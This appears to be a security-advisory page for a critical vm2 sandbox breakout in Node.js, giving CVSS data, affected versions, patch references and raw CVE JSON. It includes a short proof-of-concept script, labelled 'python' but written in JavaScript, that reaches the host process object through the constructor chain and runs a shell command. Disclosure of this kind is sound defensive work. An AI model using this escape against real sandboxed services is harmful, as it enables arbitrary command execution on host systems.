Security Vulnerability Report
中文
CVE-2026-24118 CVSS 9.8 CRITICAL

CVE-2026-24118

Published: 2026-05-04 17:16:22
Last Modified: 2026-05-08 19:30:39
Source: [email protected]

Description

vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE
vm2 < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
const {VM} = require('vm2'); const vm = new VM(); // Malicious code designed to escape the sandbox // This exploits the logic flaw to access host objects const untrustedCode = ` try { // Attempt to break out using a known technique const error = new Error(); const hostConstructor = error.constructor.constructor; // Retrieve the process object from the host const process = hostConstructor('return process')(); // Execute arbitrary command on the host system process.mainModule.require('child_process').execSync('whoami').toString(); } catch (e) { e.toString(); } `; console.log(vm.run(untrustedCode));

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24118", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:21.643", "lastModified": "2026-05-08T19:30:38.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.11.0", "matchCriteriaId": "6DD48308-6219-4C66-9BE7-246EE56FB834"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.